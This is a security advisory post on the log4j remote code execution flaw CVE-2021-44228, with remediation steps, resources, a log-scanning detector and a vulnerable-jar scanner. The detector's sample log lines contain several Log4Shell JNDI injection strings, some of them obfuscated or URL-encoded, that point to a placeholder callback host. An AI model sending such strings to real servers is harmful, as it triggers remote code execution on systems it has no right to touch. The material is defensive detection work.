The aim of this article is to provide some core information about the log4j vulnerability that has been generating a lot of noise in the last few days, as well as a list of four steps we recommend based on advice from government agencies and the security groups we are members of.
This vulnerability is serious as it affects a very wide range of devices (Cisco, Check Point, etc.) and applications/services (VMware vCenter, Apache-based websites, SentinelOne, etc.).
It has a CVSS score of 10/10 (critical), the worst possible, and allows unauthenticated remote code execution: CVE-2021-44228.
The vulnerability affects applications running any version of log4j before version 2.15.0 and is exploited by sending a specific text string that is interpreted by the log4j library.
The Cybersecurity & Infrastructure Security Agency (CISA) has issued some guidance about it: CISA Guidance
The four steps to prioritise:
- Start by enumerating all internet-facing devices and checking whether they are vulnerable: egress points, firewalls, routers, web servers/applications, etc.
- Check internal devices for this vulnerability:
  - First, any devices that may process internet traffic, such as internal web servers/applications, endpoints, etc.
  - Then any other devices, as this vulnerability could be used by a malicious insider or by an attacker who has already gained inside access.
- Configure your IDS/IPS and WAF to detect/stop this vulnerability. This has a limited effect, as the strings can be obfuscated/changed, but it can still help stop some of the attacks.
- Review the logs of key assets for signs of attacks or compromise linked to this vulnerability.
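The log review in the last step, and the reason the WAF/IDS step has only limited effect, can be shown on a few log lines. The script below is an added example, not code from the article or from any of the vendors it names: it strips the common obfuscations of the log4j lookup string (URL encoding, `${lower:}`/`${upper:}` wrappers and `${...:-x}` default-value tricks) before matching, so that a single signature covers the variants a plain `${jndi:` search misses. The sample access-log lines are constructed, and the callback hostname is a placeholder.

```python
import re
from urllib.parse import unquote

# Undo the lookup-nesting tricks used to hide the JNDI string from naive
# substring signatures, then look for the lookup itself.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")                     # ${::-j}    -> j
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)  # ${jndi:<proto>:


def normalise(text, max_rounds=10):
    """Peel off URL encoding and nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        previous = text
        text = unquote(text)                    # %24%7B -> ${
        text = _CASE_LOOKUP.sub(r"\1", text)    # resolve ${lower:x} / ${upper:x}
        text = _DEFAULT_VALUE.sub(r"\1", text)  # resolve ${anything:-x}
        if text == previous:
            break
    return text


def scan_lines(lines):
    """Return (line_number, protocol) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalise(line))
        if match:
            hits.append((number, match.group(1).lower()))
    return hits


# Constructed sample access-log lines (not from the article); the callback host
# is a placeholder. Lines 3 to 5 would slip past a plain "${jndi:" search.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://callback.example.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://callback.example.invalid/b}"',
    '10.0.0.12 - - [11/Dec/2021:10:02:00 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for number, protocol in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup via {protocol}")
```

Run it over real access, application and proxy logs line by line; the lookup can appear in any logged field (User-Agent, path, headers, form values), which is why the whole line is normalised rather than one field. Mixed-case spellings such as `${JNDI:LDAP://` are covered by the case-insensitive match.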
Useful Resources:
- To check if a device/application/service is vulnerable:
  - Check with the vendor
  - Use a scanner such as Nessus or a reputable free script such as: Lunasec github
- Apache's official log4j vulnerability page: Apache log4j
- CISA will maintain a list of vulnerable services/applications in its GitHub repository (it is empty at the moment, but this should change soon): CISA Github vulnerable vendor Database
- A list of vulnerable services/applications (not verified, so use with care, but already useful to get an idea of what is vulnerable): List of vulnerable vendors
- A guide on how to detect and remediate the vulnerability by Lunasec: Lunasec Log4j guidance
- A list of Indicators of Compromise (IOC): IOC
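The scanner-style check the resources above point at can be reproduced on your own file systems. The script below is an added example, not the article's code and not the Lunasec or Nessus tooling it mentions: it walks a directory, opens every jar/war/ear, looks for the JndiLookup class that exposes log4j-core, reads the Implementation-Version from the manifest, and descends into archives bundled inside other archives, which is where a file-name-only search misses copies. The fixed-version threshold is the 2.15.0 the article states (treat it as a parameter and move it to whatever the vendor currently recommends). The `build_sample_tree` fixture writes constructed stand-in jars with placeholder class bytes, not real Log4j artifacts.

```python
import io
import os
import re
import tempfile
import zipfile

# Presence of this class is what exposes a log4j-core jar to CVE-2021-44228.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_VERSION = (2, 15, 0)  # threshold named in the article; update as vendor advice moves
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text or "")
    return tuple(int(part) for part in match.groups()) if match else None


def manifest_version(zf):
    """Read Implementation-Version from META-INF/MANIFEST.MF, or None if absent."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.lower().startswith("implementation-version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def inspect_archive(zf, label, findings):
    """Record whether this archive carries JndiLookup, then recurse into nested archives."""
    names = zf.namelist()
    if JNDI_CLASS in names:
        version = manifest_version(zf)
        if version is None:
            status = "unknown-version"  # still needs a manual look
        elif version < FIXED_VERSION:
            status = "vulnerable"
        else:
            status = "patched"
        findings.append((label, version, status))
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(nested, f"{label}!{name}", findings)


def scan_tree(root):
    """Walk a directory tree and return sorted (label, version, status) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for filename in files:
            if not filename.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, filename)
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, os.path.relpath(path, root), findings)
            except zipfile.BadZipFile:
                continue
    return sorted(findings)


def build_sample_tree(root):
    """Constructed fixture: stand-in jars with placeholder class bytes, not real Log4j."""
    def make_jar(path, version=None, with_jndi=True, extra=None):
        with zipfile.ZipFile(path, "w") as zf:
            if version:
                zf.writestr("META-INF/MANIFEST.MF",
                            f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"placeholder")
            for name, data in (extra or {}).items():
                zf.writestr(name, data)
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    make_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(lib, "log4j-core-2.15.0.jar"), "2.15.0")
    make_jar(os.path.join(lib, "other.jar"), "1.0.0", with_jndi=False)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "rb") as f:
        old_jar = f.read()  # bundle the old copy inside a web application archive
    make_jar(os.path.join(root, "app.war"), with_jndi=False,
             extra={"WEB-INF/lib/log4j-core-2.14.1.jar": old_jar})


def demo():
    """Build the fixture in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for label, version, status in demo():
        print(f"{status:16} {version} {label}")
```

Point `scan_tree` at application roots, container images mounted on disk and build caches; the `!` in a label marks a copy found inside another archive, which is the case a search for `log4j-core-*.jar` by file name never sees.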
To conclude, this is not just another “vulnerability”: it affects so many different vendors and is being actively exploited, and there are also credible rumours of threat actors starting to create worms with it and linking it to other attacks with LDAP, etc. This means it will only get worse in the coming days/weeks.